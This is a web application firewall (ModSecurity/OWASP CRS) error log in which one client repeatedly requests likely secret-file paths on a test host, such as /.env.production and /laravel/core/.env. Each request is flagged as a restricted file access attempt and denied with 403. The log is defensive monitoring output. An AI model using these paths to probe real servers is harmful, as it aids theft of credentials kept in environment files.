[Sat Mar 21 04:09:57.863670 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.local"] [unique_id "ab4MBdTas8ZTYtMe0Y3QzgAAAAE"]
[Sat Mar 21 04:09:58.161895 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "ab4MBtTas8ZTYtMe0Y3QzwAAAAE"]
[Sat Mar 21 04:09:58.162049 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "ab4MBtTas8ZTYtMe0Y3QzwAAAAE"]
[Sat Mar 21 04:09:58.162222 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/APP/.env"] [unique_id "ab4MBtTas8ZTYtMe0Y3QzwAAAAE"]
[Sat Mar 21 04:09:58.456869 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0AAAAAE"]
[Sat Mar 21 04:09:58.457069 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0AAAAAE"]
[Sat Mar 21 04:09:58.457274 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.staging"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0AAAAAE"]
[Sat Mar 21 04:09:58.751932 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0QAAAAE"]
[Sat Mar 21 04:09:58.752087 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0QAAAAE"]
[Sat Mar 21 04:09:58.752237 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.local"] [unique_id "ab4MBtTas8ZTYtMe0Y3Q0QAAAAE"]
[Sat Mar 21 04:09:59.079780 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0gAAAAE"]
[Sat Mar 21 04:09:59.079949 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0gAAAAE"]
[Sat Mar 21 04:09:59.080157 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env.production"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0gAAAAE"]
[Sat Mar 21 04:09:59.375254 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0wAAAAE"]
[Sat Mar 21 04:09:59.375424 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0wAAAAE"]
[Sat Mar 21 04:09:59.375602 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.staging"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q0wAAAAE"]
[Sat Mar 21 04:09:59.671016 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q1AAAAAE"]
[Sat Mar 21 04:09:59.671180 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q1AAAAAE"]
[Sat Mar 21 04:09:59.671349 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.local"] [unique_id "ab4MB9Tas8ZTYtMe0Y3Q1AAAAAE"]
[Sat Mar 21 04:10:00.032667 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1QAAAAE"]
[Sat Mar 21 04:10:00.032823 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1QAAAAE"]
[Sat Mar 21 04:10:00.032975 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1QAAAAE"]
[Sat Mar 21 04:10:00.366033 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1gAAAAE"]
[Sat Mar 21 04:10:00.366199 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1gAAAAE"]
[Sat Mar 21 04:10:00.366374 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test/.env.local"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1gAAAAE"]
[Sat Mar 21 04:10:00.698160 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1wAAAAE"]
[Sat Mar 21 04:10:00.698320 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1wAAAAE"]
[Sat Mar 21 04:10:00.698540 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q1wAAAAE"]
[Sat Mar 21 04:10:00.993147 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q2AAAAAE"]
[Sat Mar 21 04:10:00.993308 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q2AAAAAE"]
[Sat Mar 21 04:10:00.993468 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.production"] [unique_id "ab4MCNTas8ZTYtMe0Y3Q2AAAAAE"]
[Sat Mar 21 04:10:01.309727 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2QAAAAE"]
[Sat Mar 21 04:10:01.309902 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2QAAAAE"]
[Sat Mar 21 04:10:01.310079 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2QAAAAE"]
[Sat Mar 21 04:10:01.606374 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2gAAAAE"]
[Sat Mar 21 04:10:01.606530 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2gAAAAE"]
[Sat Mar 21 04:10:01.606684 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2gAAAAE"]
[Sat Mar 21 04:10:01.901969 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2wAAAAE"]
[Sat Mar 21 04:10:01.902147 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2wAAAAE"]
[Sat Mar 21 04:10:01.902306 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.production"] [unique_id "ab4MCdTas8ZTYtMe0Y3Q2wAAAAE"]
